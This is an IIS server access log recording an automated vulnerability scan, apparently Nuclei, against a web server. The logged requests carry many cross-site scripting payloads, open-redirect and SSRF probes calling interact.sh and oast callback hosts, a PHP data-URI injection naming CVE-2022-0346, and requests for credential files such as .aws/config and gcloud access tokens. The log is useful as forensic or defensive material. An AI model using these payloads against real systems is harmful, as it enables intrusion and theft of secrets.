2023-07-06 06:07:09 103.153.214.94 GET /cgi-bin/manlist section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/2S8fNnwUbPu3oeDrNf5Wrrxy3js/)%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-07-06 06:08:01 103.153.214.94 POST /plugins/servlet/groupexportforjira/admin/json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28
2023-07-06 06:09:29 103.153.214.94 GET /metrics - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-07-06 06:14:06 103.153.214.94 GET /ui/jobs - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 36
2023-07-06 06:16:19 103.153.214.94 GET /homeautomation_v3_3_2/api.php do=groups/toggle&amp;groupid=1&amp;redirect=https://interact.sh/&amp;status=1 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 31
2023-07-06 06:19:37 103.153.214.94 GET /api.php action=logout&amp;forward=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 30
2023-07-06 06:26:28 103.153.214.94 GET /haproxy-status - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-07-06 06:26:28 103.153.214.94 GET /haproxy stats 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 27
2023-07-06 06:28:39 103.153.214.94 GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 27
2023-07-06 06:30:58 103.153.214.94 GET / mp_idx=%22;alert(%271%27);// 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 30
2023-07-06 06:32:18 103.153.214.94 GET /thruk/cgi-bin/login.cgi thruk/cgi-bin/status.cgi%3fstyle=combined&amp;title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 32
2023-07-06 06:32:58 103.153.214.94 GET /login.php secret=&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-07-06 06:33:37 103.153.214.94 GET /php/node_info.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 33
2023-07-06 06:35:55 103.153.214.94 GET /register/ redirect_to=https://interact.sh/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 28
2023-07-06 06:39:38 103.153.214.94 GET /gsearch.php.en prod=&#039;;prompt`document.domain`;// 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 28
2023-07-06 06:45:22 103.153.214.94 GET / address_lat&amp;address_lng&amp;distance=10&amp;lcats%5B%5D&amp;location_search&amp;nearby=off&amp;search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-07-06 06:46:05 103.153.214.94 GET /index.php acy_source=widget%202&amp;acyformname=formAcym93841&amp;acysubmode=widget_acym&amp;ajax=0&amp;ctrl=frontusers&amp;ctrl=frontusers&amp;hiddenlists=1&amp;noheader=1&amp;option=acymailing&amp;page=acymailing_front&amp;redirect=https://interact.sh&amp;task=subscribe&amp;user[email]=example@mail.com 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 07:03:58
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 07:03:58 103.153.214.94 GET /resource/md/get/url url=http://oast.pro 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 28
2023-07-06 07:04:51 103.153.214.94 GET /clansphere/mods/clansphere/lang_modvalidate.php language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;module=module 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28
2023-07-06 07:13:49 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 401 1 1326 94
2023-07-06 07:13:49 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 401 1 1326 86
2023-07-06 07:16:52 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 84
2023-07-06 07:16:52 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 33
2023-07-06 07:16:53 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=18aa31b8-39a2-4413-8077-a1e5d5ee5667;op=Sync - 200 0 0 413
2023-07-06 07:16:53 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 885
2023-07-06 07:16:53 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 29
2023-07-06 07:16:55 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=18aa31b8-39a2-4413-8077-a1e5d5ee5667;op=Sync - 200 0 0 1186
2023-07-06 07:16:55 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 1291
2023-07-06 07:28:56 103.153.214.94 GET /nagios/cgi-bin/status.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-07-06 07:28:56 103.153.214.94 GET /cgi-bin/nagios4/status.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 24
2023-07-06 07:28:56 103.153.214.94 GET /cgi-bin/nagios3/status.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 24
2023-07-06 07:34:02 103.153.214.94 GET /themes - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 31
2023-07-06 07:38:52 103.153.214.94 GET /gotoURL.asp id=43569&amp;url=interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 30
2023-07-06 07:46:51 103.153.214.94 GET /login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 26
2023-07-06 07:48:00 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 81
2023-07-06 07:48:00 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 34
2023-07-06 07:48:01 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 1181
2023-07-06 07:48:01 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=13ab19af-735c-4657-ad49-db196f9b7d3b;op=Sync - 200 0 0 501
2023-07-06 07:48:01 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 28
2023-07-06 07:48:02 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 - - 200 0 0 1045
2023-07-06 07:48:02 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.125.223 VSCmdLine:WTE6.0.6.36821;sid=13ab19af-735c-4657-ad49-db196f9b7d3b;op=Sync - 200 0 0 911
2023-07-06 08:03:01 103.153.214.94 GET /wp-admin/admin-ajax.php action=fetch_posts&amp;hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&amp;stream-id=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 26
2023-07-06 08:03:26 103.153.214.94 GET /wp-content/plugins/embed-swagger/swagger-iframe.php url=xss://%22-alert(document.domain)-%22 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 29
2023-07-06 08:09:52 103.153.214.94 GET /index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 30
2023-07-06 08:12:07 103.153.214.94 GET /conf - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 30
2023-07-06 08:12:23 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-07-06 08:14:50 103.153.214.94 GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 33
2023-07-06 08:29:52 103.153.214.94 GET /www/delivery/afr.php &quot;)&#039;,10000000);alert(1337);setTimeout(&#039;alert(&quot;&amp;refresh=10000 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 30
2023-07-06 08:29:57 103.153.214.94 GET /login/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 24
2023-07-06 08:34:39 103.153.214.94 GET /.aws/config - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-07-06 08:39:08 103.153.214.94 GET /logout next=%208%22onmouseover=%22alert(document.domain) 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-07-06 08:39:38 103.153.214.94 GET /wp-admin/admin-post.php swp_debug=load_options&amp;swp_url=http://ciio7miofm2mtabc1uaghhbxc95p3eb8w.oast.online 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 08:56:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 08:56:00 103.153.214.94 GET /rootDesc.xml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 29
2023-07-06 08:59:13 103.153.214.94 GET /Login !&#039;&gt;&lt;sVg/OnLoAD=alert`1337`// 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-07-06 09:01:41 103.153.214.94 GET / p=1&amp;xsg-format=yyy&amp;xsg-page=pp&amp;xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&amp;xsg-type=zz 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 26
2023-07-06 09:01:41 103.153.214.94 GET / p=1&amp;xsg-format=yyy&amp;xsg-page=pp&amp;xsg-provider=data://text/html,&lt;?php%20echo%20md5(&quot;CVE-2022-0346&quot;);%20//&amp;xsg-type=zz 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 22
2023-07-06 09:12:10 103.153.214.94 GET /.svn/wc.db - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 28
2023-07-06 09:12:10 103.153.214.94 GET /wc.db - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 24
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 09:28:19
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 09:28:19 103.153.214.94 GET /sidekiq/queues/&quot;onmouseover=&quot;alert(nuclei)&quot; - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 29
2023-07-06 09:39:21 103.153.214.94 POST /login - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 24
2023-07-06 09:52:16 103.153.214.94 GET /redirector.php url=https://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 30
2023-07-06 09:52:17 103.153.214.94 GET /redirector.php do=nodelay&amp;url=https://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 43
2023-07-06 10:04:57 103.153.214.94 GET /templates/config/profmanage.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 25
2023-07-06 10:09:34 103.153.214.94 GET /__nuxt_error stack=%0A&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 27
2023-07-06 10:11:00 103.153.214.94 GET /plugins/web/service/search/auto-completion/domain/en.xml q=adm 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 27
2023-07-06 10:11:18 103.153.214.94 GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-07-06 10:15:52 103.153.214.94 GET /secure/QueryComponentRendererValue!Default.jspa assignee=user:admin 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 30
2023-07-06 10:15:52 103.153.214.94 GET /jira/secure/QueryComponentRendererValue!Default.jspa assignee=user:admin 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 10:34:14
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 10:34:14 103.153.214.94 GET /.hg/hgrc - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28
2023-07-06 10:40:35 103.153.214.94 GET /wp-content/plugins/raygun4wp/sendtesterror.php backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-07-06 10:41:48 103.153.214.94 POST /pcidss/report set=1&amp;sid=loginchallengeresponse1requestbody&amp;type=allprofiles&amp;username=nsroot 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 33
2023-07-06 10:41:48 103.153.214.94 GET /menu/ss force_setup=1&amp;sid=nsroot&amp;username=nsroot 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 23
2023-07-06 10:41:48 103.153.214.94 GET /menu/neo - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 23
2023-07-06 10:41:48 103.153.214.94 GET /menu/stc - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 24
2023-07-06 10:41:51 103.153.214.94 POST /patient/search_result.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 24
2023-07-06 10:44:06 103.153.214.94 GET /admin/histograms fmt=plot_cdf&amp;h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;log_scale=true 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 27
2023-07-06 10:44:59 103.153.214.94 GET /wp-content/plugins/crm-perks-forms/readme.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30
2023-07-06 10:44:59 103.153.214.94 GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php %20Company=&lt;img%20src%20onerror=alert(document.domain)&gt;&amp;FirstName=&lt;img%20src%20onerror=alert(document.domain)&gt;&amp;LastName=&lt;img%20src%20onerror=alert(document.domain)&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
2023-07-06 10:46:55 103.153.214.94 GET /login/ uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 27
2023-07-06 10:46:55 103.153.214.94 GET / uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 25
2023-07-06 10:47:08 103.153.214.94 GET /ProcessWait.aspx POBatch=test&amp;WaitDuration=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 23
2023-07-06 10:47:08 103.153.214.94 GET /ProcessWait.aspx POBatch=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;WaitDuration=3 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-07-06 10:48:51 103.153.214.94 GET /ssoAdapter/logoutAction.do servProvCode=SAFVC&amp;successURL=https://interact.sh/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 30
2023-07-06 10:55:53 103.153.214.94 GET /select_project.php url=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 26
2023-07-06 10:55:53 103.153.214.94 GET /clock_status.php current_page=http://interact.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 23
2023-07-06 10:59:31 103.153.214.94 GET /client/manage/ourphp_tz.php act=rt&amp;callback=&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 32
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 11:58:42
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 11:58:42 103.153.214.94 GET /wp-content/plugins/advanced-text-widget/advancedtext.php page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 30
2023-07-06 12:00:35 103.153.214.94 GET /access_tokens.db - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 25
2023-07-06 12:00:35 103.153.214.94 GET /.config/gcloud/access_tokens.db - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 22
2023-07-06 12:02:47 103.153.214.94 GET /.git/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 30
2023-07-06 12:06:38 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 29
2023-07-06 12:20:54 103.153.214.94 POST /wp-admin/admin-ajax.php td_theme_name=Newspaper&amp;v=11.2 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30
2023-07-06 12:24:41 103.153.214.94 GET /cgi-bin/printenv - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 31
2023-07-06 12:27:26 103.153.214.94 GET / PagePrincipale/rss&amp;id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 12:44:06
